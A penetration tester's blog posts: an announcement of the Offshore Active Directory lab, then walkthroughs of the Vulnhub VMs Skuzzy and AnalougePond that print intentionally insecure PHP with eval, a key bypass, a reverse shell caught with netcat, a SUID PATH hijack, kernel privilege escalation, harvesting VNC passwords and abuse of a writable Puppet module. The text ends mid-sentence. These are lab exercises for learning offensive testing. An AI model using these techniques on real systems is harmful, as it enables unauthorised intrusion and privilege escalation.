In August ch4p from Hack the Box approached me with an offer to build a CTF for the annual Greek capture the flag event called Panoptis. The idea was to build a unique Active Directory lab environment to challenge CTF competitors by exposing them to a simulated real-world penetration test (pretty rare for a CTF). I spent a bit over a month building the first iteration of the lab and thus Offshore was born.
I flew to Athens, Greece for a week to provide on-site support during the lab. Overall the CTF lab was a hit and very well received by the competitors and others involved with the event.
Afterwards, ch4p offered for me to further build out the lab and eventually offer it as a Pro Lab on the main Hack the Box website. I spent another 3 or so months refining elements within the lab, increasing the overall size and difficulty and causing ch4p a lot of stress by asking for more and more storage, ram and virtual networks.
I spent countless hours with the goal of building a realistic Active Directory based lab that had the feel of a real-world corporate environment made up of many things I have seen during internal/external penetration testing engagements over the years. My goal was to produce a lab that would be accessible and achievable by junior penetration testers, help mid-level folks improve their skills and even provide a bit of a challenge to seasoned veterans. The lab also serves as a test bed to try out many common and obscure AD attacks that you may read about but either never encounter during a real-world engagement or do not have the proper testing environment to practice and refine the techniques.
The lab went live on September 1, 2018 and has been a hit so far. Of course there were a few issues I had to hammer out after go-live and some lessons learned but overall it has been a success. This project has been an exciting and humbling experience. I learned a ton while building this and configuring many of the attacks. So far feedback has been positive.
Anyways, lets get into a description of the lab.
Description
You are an agent tasked with exposing money laundering operations in an offshore international bank. Breach the DMZ and pivot through the internal network to locate the bank’s protected databases and a shocking list of international clients. OFFSHORE is designed to simulate a real-world penetration test, starting from an external position on the internet and gaining a foothold inside a simulated corporate Windows Active Directory network. Users will have to pivot and jump across trust boundaries to complete the lab. This lab is intended to expose participants to:
Web application attacks
Enumeration
Exploitation of common and obscure real-world Active Directory flaws
Local privilege escalation
Lateral movement and crossing trust boundaries
Evading endpoint protections
Reverse engineering
Out-of-the-box thinking
Players will have the opportunity to attack 16 hosts of various operating system types and versions to obtain 29 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. The Active Directory lab simulates the look and feel of a real-world corporate network complete with very active simulated users and other elements of a busy enterprise. The lab is designed to start out relatively easy and progress in difficulty throughout.
Users will start from an external perspective and have to penetrate the “DMZ” and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab.
Target Audience
I designed Offshore to appeal to a wide variety of users, everyone from junior-level penetration testers to seasoned testers as well as infosec hobbyists and even blue teamers, there is something for everyone. I can pretty much guarantee you will pick up at least a few new tricks which can be immediately applied to your real-world engagements or take back to your organization to help improve the overall security posture.
Pricing
Please reach out for pricing. Tickets are available for 30, 60, or 90 days of access for individuals. Corporate pricing is also available for larger groups.
Additional Information
Offshore is hosted in conjunction with Hack the Box (https://www.hackthebox.eu). Participants will receive a VPN key to connect directly to the lab.
Once connected to VPN, the entry point for the lab is 10.10.110.0/24. *Note* The firewall at 10.10.110.3 is out of scope.
If you have questions or would like to learn more about the lab, feel free to contact me on Twitter or on Mattermost. Participants in the lab will have access to a private Offshore channel on the Netsecfocus Mattermost (https://chat.netsecfocus.com/join).
It’s been a while since I’ve had the time to take on a VM over at vulnhub or put together a walkthrough. Building my own challenges, studying for the OSCE, work, and family took all of my time.
I finally had some free time so I checked out the latest slew of releases. Ew_Skuzzy had been up for a few days without any walkthroughs so it looked like a good challenge.
The readme has a note that VMware users may have issues. If you use VMware workstation like I do (or player) these steps will get you up and running.
I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:
1) sudo su
2) mount /dev/sda1 /mnt
3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'4)Vim/mnt/etc/default/grub and edit the line
GRUB_CMDLINE_LINUX="" to read:
GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"5)Poweroff6)Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot intorescue mode.7)Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.8)Inthis shell type "update-grub"then type "exit"9)Select"execute a shell in the installer environment",then"poweroff"10)Remove the CD from the VM, boot to firmware and change the boot order back to the HDD.Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.
Once that was done I fired up the VM, and got to work. The creator was nice enough to post the IP for us:
I started off with an nmap scan of all ports which showed SSH, nginx on port 80 and an ISCSI service listening on port 3260.
root@kali:~# nmap -sV -p--T4 192.168.85.146StartingNmap6.46( http://nmap.org ) at 2017-03-21 13:09 EDTStats:0:00:01 elapsed;0 hosts completed (0 up),1 undergoing ARP PingScanParallel DNS resolution of 1 host.Timing:About0.00%doneNmap scan report for192.168.85.146Hostis up (0.00023s latency).Not shown:65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)80/tcp open http nginx
3260/tcp open iscsi?1 service unrecognized despite returning data.If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=3/21%Time=58D15E6E%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4ubuntu2\.1\r\n");
MAC Address:00:0C:29:C8:3D:31(VMware)
I ran dirb for a bit and came up with several trolls:
The page source of the above page had a base64 encoded comment in the HTML:
Sadly not our first flag:
root@kali:~# echo SGVsbG8sIGlzIGl0IGZsYWdzIHlvdSdyZSBsb29raW5nIGZvcj8KSSBjYW4gc2VlIGl0IGluIHlvdXIgZXllcwpJIGNhbiBzZWUgaXQgaW4geW91ciBzbWlsZQpGbGFncyBhcmUgYWxsIEkndmUgZXZlciB3YW50ZWQgYW5kIG15IHBvcnRzIGFyZSBvcGVuIHdpZGUgCkNhdXNlIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBzYXkgYW5kIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBkbwpBbmQgSSB3YW50IHRvIHRlbGwgeW91IHNvIG11Y2gsIG5vIGZsYWdzIGZvciB5b3UuLi4K| base64 -d
Hello,is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted andmy ports are open wide
Cause you know just what to say and you know just what to doAnd I want to tell you so much,no flags for you...
I next mounted the file system and found the first flag along with a floppy disk image:
root@kali:~# mount /dev/sdb /mnt/skuzzy/
root@kali:~# cd /mnt/skuzzy/
root@kali:/mnt/skuzzy# ls
bobsdisk.dsk flag1.txt lost+found
root@kali:/mnt/skuzzy# cat flag1.txt Congratulations!You've discovered the first flag!
flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}
Let's see how you go with the next one...
The floppy can be mounted with the following commands:
root@kali:/mnt/skuzzy# losetup /dev/loop0 /mnt/skuzzy/bobsdisk.dsk
root@kali:/mnt# mkdir /mnt/floppy
root@kali:/mnt# mount /dev/loop0 -o loop /mnt/floppy
root@kali:/mnt# ls
floppy hgfs skuzzy
root@kali:/mnt# cd floppy/
root@kali:/mnt/floppy# ls
lost+found ToAlice.csv.enc ToAlice.eml
An email to Alice gave me flag # 2 as well as several clues for how to decrypt the encrypted .csv file:
root@kali:/mnt/floppy# cat ToAlice.eml
G'day Alice,
You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs,and it's time we took a stand!
Starting now, today, immediately, I'm never using asymmetric key encryption again,and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at mylocal hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there iswhen it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right?Anyway, he said it won some big important competition among crypto geeks inOctober2000?Lucky Y2K didn't happen then, I suppose or that would have been one boring party!
Anyway this algorithm sounded good to me. I used the updated version that won the competition.
You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly.My favourite newSpanish swear came in handy whenthis happened... supercalifragilisticoespialidoso !Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!
Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot)
Cheers,
Bob.
PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...
PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
The Spanish swear word was likely a key “supercalifragilisticoespialidoso”;
An allusion to rockyou (possibly rockyou.txt for brute forcing the passphrase); and
Command option -md sha256 (these are openssl command line options).
The intent may have been to brute force the passphrase but it seemed like it had already been given to us, so after a bit of trial and error I was able to decrypt the .csv with the following command, feeding it the passphrase above:
The .csv gave me flag #3 as well as some new web directories to target:
The first was a troll with some retro Geocities scrolling marquee, nice touch:
The page source again contained a base64 encoded comment which was another troll:
root@kali:~# cat base64.txt | base64 -d
GeorgeCostanza:[SoupNazi gives him a look]Medium turkey chili.[instantly moves to the cashier]JerrySeinfeld:Medium crab bisque.GeorgeCostanza:[looks in his bag and notices no bread in it] I didn't get any bread.
Jerry Seinfeld: Just forget it. Let it go.
George Costanza: Um, excuse me, I - I think you forgot my bread.
Soup Nazi: Bread, $2 extra.
George Costanza: $2? But everyone in front of me got free bread.
Soup Nazi: You want bread?
George Costanza: Yes, please.
Soup Nazi: $3!
George Costanza: What?
Soup Nazi: NO FLAG FOR YOU
The second URL was a sweet custom web app:
The ‘Feed Reader’ page was of particular interest and at first glance looked as though it could be leveraged for either an LFI or RFI, or both!
Browsing to http://192.168.85.146/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt gave me the following:
Browsing directly to the data.txt file gave me the full contents which would be useful later:
I checked the troll image exif data for any clues but there was nothing to be had.
I next turned my attention to the ‘p’ parameter to see if I could get something going. Using the technique discussed in this post https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ I was able to leverage an LFI to pull out the base64 encoded source of each of the PHP pages. I also ran this to try to read files such as /etc/passwd but there were some blocks in place.
Index.php
Flag.php gave me the 4th flag as well as a clue that this flag would come in handy at some point:
The contents of reader.php was particularly interesting:
<?php
defined('VIAINDEX')ordie('Ooooh! So close..');?><h1>Feed Reader</h1><?php
if(isset($_GET['url'])){
$url = $_GET['url'];}else{print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");}if(isset($url)&& strlen($url)!=''){// Setup some variables.
$secretok =false;
$keyneeded =true;// Localhost as a source doesn't need to use the key.if(preg_match("#^http://127.0.0.1#", $url)){
$keyneeded =false;
$secretok =true;}// Handle the key validation when it's needed.if($keyneeded){
$key = $_GET['key'];if(is_array($key)){die("Array trick is mitigated ;)");}if(isset($key)&& strlen($key)=='47'){
$hashedkey = hash('sha256', $key);
$secret ="5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";// If you can use the following code for a timing attack// then good luck But.. You have the source anyway, right? if(strcmp($hashedkey, $secret)==0){
$secretok =true;}else{die("Sorry... Authentication failed. Key was invalid.");}}else{die("Authentication invalid. You might need a key.");}}// Just to make sure the above key check was passed.if(!$secretok){die("Something went wrong with the authentication process");}// Now load the contents of the file we are reading, and parse// the super awesomeness of its contents!
$f = file_get_contents($url);
$text = preg_split("/##text##/s", $f);if(isset($text['1'])&& strlen($text['1'])>0){print($text['1']);}print"<br /><br />";
$php = preg_split("/##php##/s", $f);if(isset($php['1'])&& strlen($php['1'])>0){eval($php['1']);// "If Eval is the answer, you're asking the wrong question!" - SG// It hurts me to write insecure code like this, but it is in the// name of education, and FUN, so I'll let it slide this time.}}
A check was being made to make sure that the file being server was from the localhost otherwise a key value was needed. The key value had to be the sha256 of a 47 character string and passed as a parameter with the GET request. Hm, flag 4 is exactly 47 characters. The sha256 of flag 4 checked out perfectly against the $secret variable in the source:
The PHP would next check the data.txt ##text## section and print it to the screen and evaluate whatever PHP code was in the ##php## section. A quick check showed me that I had command execution.
There are several ways to get a shell but this is what I tried after trying to obtain a reverse shell with mknod, netcat and other methods did not work. This could have been split into one command as well instead of two.
I created a tiny shell script with the following PHP command and hosted it on my local Apache server:
I then executed the following two commands to upload the shell script to /tmp and execute it:
Wonderful, a shell!
root@kali:/var/www# nc -lvnp 443
listening on [any]443...
connect to [192.168.85.131]from(UNKNOWN)[192.168.85.146]51562/bin/sh:0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ ls
ls
data.txt index.php party.php trollface.png
flag.php parrot.gif reader.php welcome.php
The usual enumeration turned up an interesting SUID binary in /opt.
Just running the binary it appeared to execute the ID command before attempting to make an SSH connection:
On a hunch that ID command was not being called with an absolute path I created a dummy file /tmp/id with the contents “/bin/sh” and modified my path variable. By doing this, if successful, when running the alicebackup binary from the /opt directory while in the /tmp directory I should be able to have the program call my malicious ID shell script due to the path abuse.
I ran the command, fixed up my path variable and it worked. I now had root access and the 5th and final flag:
This was a great VM and an interesting twist with the ISCSI angle as well as the combined LFI/RFI. Unique and kept me on my toes. Setting up open-iscsi to interact with the service was not difficult and worth the learning opportunity.
Thanks to @vortexau for putting together challenge, can’t wait to see the next one!
As always thank you to @g0tmi1k for hosting these challenges and maintaining Vulnhub.
Just around the time I was learning/experimenting with Puppet in my home lab knightmare asked me to preview a new VM based around some real-world tactics. This was a truly unique and interesting challenge and shows the dangers of leaving a Puppet, Ansible or any other configuration management or package management tool unsecured. As always the VM was ripe with cultural references which kept me on my toes researching both the nuances and the technical pieces. I highly recommend taking it for a spin, you can grab it here: https://www.vulnhub.com/entry/analougepond-1,185/
The README provides some hints for getting going:
Since you're not a Teuchter, I'll offer some hints to you:Remember TCP isnot the only protocol on the InternetMy challenges are never finished with root. I make you work for the flags.The intended route is NOT to use forensics or0-days, I will not complain either way.To consider this VM complete, you need to have obtained:TrollFlag:where you normally look for them
Flag1:You have it when you book Jennifer tickets to Paris on PanAm.Flag2:It will include a final challenge to confirm you hit the jackpot.Have root everywhere (this will make sense once you're in the VM)
User passwords
2 VNC passwords
Best of luck! If you get stuck, eat some EXTRABACON
NB: Please allow 5-10 minutes or so from powering on the VM for background tasks to run before proceeding to attack.
After loading it up and waiting a few minutes I had an IP and was ready to go:
I added an entry to my hosts file to simplify things and started out with an nmap scan of all TCP ports and also a UDP scan of top 1000 ports due to the readme alluding to other protocols in use.
The TCP scan just gave me an SSH port, I didn’t even attempt bruteforcing because I knew knightmare wouldn’t make it that easy.
root@mrb3n:~# nmap -sV -Pn-T4 -p---open analoguepond
StartingNmap6.49BETA4( https://nmap.org ) at 2016-12-14 09:39 ESTStats:0:10:29 elapsed;0 hosts completed (1 up),1 undergoing SYN StealthScan
SYN StealthScanTiming:About39.70%done; ETC:10:05(0:15:34 remaining)Nmap scan report for192.168.85.128Hostis up (0.0010s latency).Not shown:65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH6.6.1p1Ubuntu2ubuntu2.8(UbuntuLinux; protocol 2.0)
MAC Address:00:0C:29:C9:A7:A4 (VMware)ServiceInfo: OS:Linux; CPE: cpe:/o:linux:linux_kernel
The UDP scan turned up SNMP and based on the readme nod towards EXTRABACON (which requires SSH, SNMP and a public SNMP community string) I directed by attention here with snmpwalk.
root@mrb3n:~# nmap -sU --open analoguepond
StartingNmap6.49BETA4( https://nmap.org ) at 2016-12-14 06:07 ESTNmap scan report for192.168.85.128Hostis up (0.00094s latency).Not shown:998 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
161/udp open snmp
MAC Address:00:0C:29:C9:A7:A4 (VMware)
I’ve truncated the output and just left in the key items
root@mrb3n:~# snmpwalk analoguepond -c public-v1
iso.3.6.1.2.1.1.1.0= STRING:"Linux analougepond 3.19.0-77-generic #85~14.04.1-Ubuntu SMP Mon Dec 5 11:19:02 UTC 2016 x86_64"
iso.3.6.1.2.1.1.2.0= OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0=Timeticks:(103731)0:17:17.31
iso.3.6.1.2.1.1.4.0= STRING:"Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0= STRING:"analougepond"
iso.3.6.1.2.1.1.6.0= STRING:"There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0= INTEGER:72
iso.3.6.1.2.1.1.8.0=Timeticks:(16)0:00:00.16
So based on this it seems pretty certain that ‘eric’ is our username. I would have tried combos such as eric.burdon, eburdon etc but ‘eric@example.com’ seemed to be nudging me in the right direction. Our hint “There is a house in New Orleans…” could only the “the Rising Sun”. Which makes sense because Eric Burdon was the lead vocalist for the band: https://en.wikipedia.org/wiki/The_Animals.
Cranking this up in my headphones as the wife and kid slept I was able to SSH in with the creds eric:therisingsun.
Once in I was dropped into Eric’s home directory and had a couple of images as well as a binary named ‘spin’ which appeared to do just that, throw up a spinning cursor. Not useful…yet. I pulled down the images with SCP and checked for anything tasty in the exif data but came up empty, for now.
eric@analougepond:~$ pwd
/home/eric
eric@analougepond:~$ ls
reticulatingsplines.gif
hmm, no clue at this point but I’ll hang onto it, it may prove to be useful.
The readme mentioned VNC passwords, a netstat showed that VNC was present on the localhost on 5900 and 5901. Ifconfig showed a virtual bridge on the 192.168.122.0/24 subnet so we must be dealing with some libvirt emulation here. The readme also mentions multiple hosts, I am guessing 2 additional ones :).
eric@analougepond:~$ netstat -antp
(No info could be read for"-p": geteuid()=1000 but you should be root.)ActiveInternet connections (servers and established)ProtoRecv-Q Send-Q LocalAddressForeignAddressState PID/Program name
tcp 00127.0.0.1:59000.0.0.0:* LISTEN -
tcp 00127.0.0.1:59010.0.0.0:* LISTEN -
tcp 00192.168.122.1:530.0.0.0:* LISTEN -
tcp 000.0.0.0:220.0.0.0:* LISTEN -
tcp 0408192.168.85.128:22192.168.85.129:55386 ESTABLISHED -
tcp6 00:::22:::* LISTEN
Looking around the file system I really didn’t find much at first. Digging deeper I believe I found the locations of the VNC passwords but could not read them until I was root, will come back to that later.
Doing a uname -a showed that the kernel was likely vulnerable to the overlayfs root exploit:
eric@analoguepond:/var/lib/libvirt/network$ uname -a
Linux analoguepond 3.19.0-25-generic#26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Running it and we’ve got out root shell and of course our first troll flag.
root@analoguepond:/tmp# cd /root
root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...?
Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...Thisis obviously troll flah #1 So keep going.
Taking a look at the libvirsh default.xml networking file gives us IPs and hostnames for our other hosts.
root@analoguepond:/var/lib/libvirt/network# lsdefault.xml
root@analoguepond:/var/lib/libvirt/network# cat default.xml <!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST.Changes to this xml configuration should be made using:
virsh net-edit defaultor other application using the libvirt API.--><networkstatus><class_id bitmap='0-2'/><floor sum='0'/><network><name>default</name><uuid>8edd2858-f408-4a4a-86f1-0993b59c6b30</uuid><forward mode='nat'><nat><port start='1024'end='65535'/></nat></forward><bridge name='virbr0' stp='on' delay='0'/><mac address='52:54:00:b2:23:25'/><ip address='192.168.122.1' netmask='255.255.255.0'><dhcp><range start='192.168.122.10'end='192.168.122.15'/><host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/><host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/></dhcp></ip></network>
We can also find live hosts with a little bash one-liner:
root@analoguepond:/var/lib/libvirt/network# for ip in 192.168.122.{1..254}; do ping -c 1 $ip > /dev/null && echo "${ip} is up"; done192.168.122.1is up
192.168.122.2is up
192.168.122.3is up
Next we need the qemu config files to grab the VNC passwords:
find /-name "*.xml"...snip.../etc/libvirt/qemu/barringsbank.xml
/etc/libvirt/qemu/puppet.xml
root@analoguepond:/etc/libvirt/qemu# cat barringsbank.xml <!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST.Changes to this xml configuration should be made using:
virsh edit barringsbank
or other application using the libvirt API.--><domain type='qemu'><name>barringsbank</name><uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid><description>Whodo you think you are...?DavidLightmanfrom memphistennessee...?</description><memory unit='KiB'>1048576</memory><currentMemory unit='KiB'>1048576</currentMemory><vcpu placement='static'>1</vcpu><os><type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type><boot dev='hd'/><bootmenu enable='yes'/><bios useserial='yes'/></os><features><acpi/><apic/><pae/></features><clock offset='utc'/><on_poweroff>destroy</on_poweroff><on_reboot>restart</on_reboot><on_crash>restart</on_crash><devices><emulator>/usr/bin/qemu-system-x86_64</emulator><disk type='file' device='disk'><driver name='qemu' type='qcow2'/><source file='/var/lib/libvirt/images/barringsbank-1.img'/><target dev='hdb' bus='ide'/><address type='drive' controller='0' bus='0' target='0' unit='1'/></disk><controller type='pci' index='0' model='pci-root'/><controller type='ide' index='0'><address type='pci' domain='0x0000' bus='0x00' slot='0x01'function='0x1'/></controller><controller type='usb' index='0'><address type='pci' domain='0x0000' bus='0x00' slot='0x01'function='0x2'/></controller><interface type='network'><mac address='52:54:00:6d:93:6a'/><source network='default'/><model type='rtl8139'/><address type='pci' domain='0x0000' bus='0x00' slot='0x03'function='0x0'/></interface><serial type='pty'><target port='0'/></serial><console type='pty'><target type='serial' port='0'/></console><input type='mouse' bus='ps2'/><input type='keyboard' bus='ps2'/><graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/><video><model type='cirrus' vram='9216' heads='1'/><address type='pci' domain='0x0000' bus='0x00' slot='0x02'function='0x0'/></video><memballoon model='virtio'><address type='pci' domain='0x0000' bus='0x00' slot='0x05'function='0x0'/></memballoon></devices></domain>-------------------------------------------------
root@analoguepond:/etc/libvirt/qemu# cat puppet.xml <!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST.Changes to this xml configuration should be made using:
virsh edit puppet
or other application using the libvirt API.--><domain type='qemu'><name>puppet</name><uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid><description>puppetmaster if you mess withthis VM I will sendyoubacktowalker</description><memory unit='KiB'>1048576</memory><currentMemory unit='KiB'>1048576</currentMemory><vcpu placement='static'>1</vcpu><os><type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type><boot dev='cdrom'/><boot dev='hd'/><bootmenu enable='yes'/><bios useserial='yes'/></os><features><acpi/><apic/><pae/></features><clock offset='utc'/><on_poweroff>destroy</on_poweroff><on_reboot>restart</on_reboot><on_crash>restart</on_crash><devices><emulator>/usr/bin/qemu-system-x86_64</emulator><disk type='file' device='disk'><driver name='qemu' type='qcow2'/><source file='/var/lib/libvirt/images/puppet-1.img'/><target dev='hdb' bus='ide'/><address type='drive' controller='0' bus='0' target='0' unit='1'/></disk><controller type='pci' index='0' model='pci-root'/><controller type='ide' index='0'><address type='pci' domain='0x0000' bus='0x00' slot='0x01'function='0x1'/></controller><controller type='usb' index='0'><address type='pci' domain='0x0000' bus='0x00' slot='0x01'function='0x2'/></controller><interface type='network'><mac address='52:54:00:5b:05:f7'/><source network='default'/><model type='virtio'/><address type='pci' domain='0x0000' bus='0x00' slot='0x03'function='0x0'/></interface><serial type='pty'><target port='0'/></serial><console type='pty'><target type='serial' port='0'/></console><input type='mouse' bus='ps2'/><input type='keyboard' bus='ps2'/><graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'><listen type='address' address='127.0.0.1'/></graphics><video><model type='cirrus' vram='9216' heads='1'/><address type='pci' domain='0x0000' bus='0x00' slot='0x02'function='0x0'/></video><memballoon model='virtio'><address type='pci' domain='0x0000' bus='0x00' slot='0x04'function='0x0'/></memballoon></devices></domain>
Here we are:
‘memphistennessee’ and ‘sendyoubacktowalker’
So I next attempt to SSH to the puppet host and am presented with a possible username and a password hint in the SSH banner:
root@analoguepond:/etc/libvirt/qemu# ssh 192.168.122.2The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------+
Passwords are very dated.. Removing spaces helps sandieshaw log in with her
most famous song
+-----------------------------------------------+
Back to Google because I clearly do not have knightmare’s music knowledge and I see that Sandie Shaw’s most famous song was called ‘Puppet on a String’. At the time I wasn’t sure if the host name referred to the song name or the Puppet open-source configuration management tool. Knowing knightmare I figured it was the latter and I was in for a wild ride yet.
I logged in with the password ‘puppetonastring’ and things started to get really interesting.
My suspicions were confirmed upon checking out the /etc/puppet directory. Basically, Puppet is an open-source configuration management tool written in Ruby which uses a series of declarative statements in the form of ‘modules’ to push down configuration changes based upon a client-server model. Seeing that port 8140 and the modules/manifests in the /etc/puppet directory confirmed that I was on the puppetmaster server and the other host in play was the client. Browsing the manifests folder for each module we can see what each module does based on the init.pp file which declares a class and any files, content, commands, permissions, services to install etc.
The nodes.pp file located in /etc/puppet/manifests show which hosts have which modules pushed down to them when a puppet run happens.
sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp
node 'default'{
include vulnhub
}
node 'puppet.example.com' inherits 'default'{
include wiggle
}
node 'barringsbank.example.com' inherits 'default'{}
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp
node 'default'{
include vulnhub
}
node 'puppet.example.com' inherits 'default'{
include wiggle
}
node 'barringsbank.example.com' inherits 'default'{
include fiveeights
}
In this case we see that both hosts have the vulnhub module pushed by inheriting the ‘default’ node and that puppet has the wiggle module and our third host barringsbank has the fiveeights module pushed down.
The vulnhub module is hilarious and is knightmare’s revenge/way of stripping out every convenient utility we usually rely on. Bye curl, wget, fetch. No Nano! I started sweating, now I HAD to use vim. Thanks man! The module does a bunch of other stuff which is pretty self-explanatory but one key is that the ‘puppet check in’ cron which happens every 10 minutes. This tells us that hosts will check into the puppetmaster every 10 minutes for anything new, like abused modules :).
sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp
## Module to unwind changed #vulnhub people make. This will unwind the most## common vectors they sued to get at my other VMsclass vulnhub {## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh)
$purge =["nano","wget","curl","fetch","nmap","netcat-traditional","ncat","netdiscover","lftp"]package{ $purge:ensure=> purged,}## The encryption is still primative Egyptian
$theresas_nightmare =["cryptcat","socat"]package{ $theresas_nightmare:ensure=> present,}## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub)
file {"/etc/sudoers.d":ensure=>"directory",
recurse =>true,
purge =>true,
force =>true,
owner => root,group=> root,
mode =>0755,
source =>"puppet:///modules/vulnhub/sudoers.d",}## revert /etc/passwd (Hey Rasta_Mouse!)
file {'/etc/passwd':ensure=> present,
owner => root,group=> root,
mode =>0644,
source =>"puppet:///modules/vulnhub/${hostname}-passwd",}## and /etc/group (Hello to you cmaddy)
file {'/etc/group':ensure=> present,
owner => root,group=> root,
mode =>0644,
source =>"puppet:///modules/vulnhub/${hostname}-group",}## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!)
file {'/etc/ssh/ssd_config':ensure=> present,
owner => root,group=> root,
mode =>0644,
source =>"puppet:///modules/vulnhub/${hostname}-sshd_config",
notify =>Service["ssh"],}## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like## Gibson
cron {"puppet check in":
command =>"/usr/bin/puppet agent --test > /dev/null 2>&1",
user =>"root",
minute =>"*/10",ensure=> present,}## Everyone forbidden by default
file {'/etc/hosts.deny':ensure=> present,
owner => root,group=> root,
mode =>0644,
source =>"puppet:///modules/vulnhub/hosts.deny",}## Firewall off to only specific hosts
file {'/etc/hosts.allow':ensure=> present,
owner => root,group=> root,
mode =>0644,
source =>"puppet:///modules/vulnhub/${hostname}-hosts.allow",}## Don't fill up the disk
tidy {"/var/lib/puppet/reports":
age =>"1h",
recurse =>true,}## Changing openssh config requires restart
service {'ssh':ensure=> running,
enable =>true,
hasstatus =>true,
hasrestart =>true,}}
The wiggle module directory gives us the source code for the C file that creates our spin binary which is funny but useless to attempt to reverse based on the source code. Stay tuned though, it will come into play soon.
The wiggle manifest is more interesting and is likely our priv esc. Every puppet run will check to make sure that /tmp/spin is present and then chown it as root and set the SUID bit.
sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp
## My first puppet module by Nick Leeson (C) Barringsbank## Put spin binary in /tmp to confirm puppet is workingclass wiggle {
file {["/tmp/spin"]:ensure=> present,
mode =>4755,
owner => root,group=> root,
source =>"puppet:///modules/wiggle/spin";}}
The spin binary is copied from /etc/puppet/modules/wiggle/files and luckily sandieshaw has write permissions on it so we can do something nasty.
rootme.sh just contains the following to add sadieshaw to the sudoers group, which is the easiest way given everything that knightmare stripped away from us:
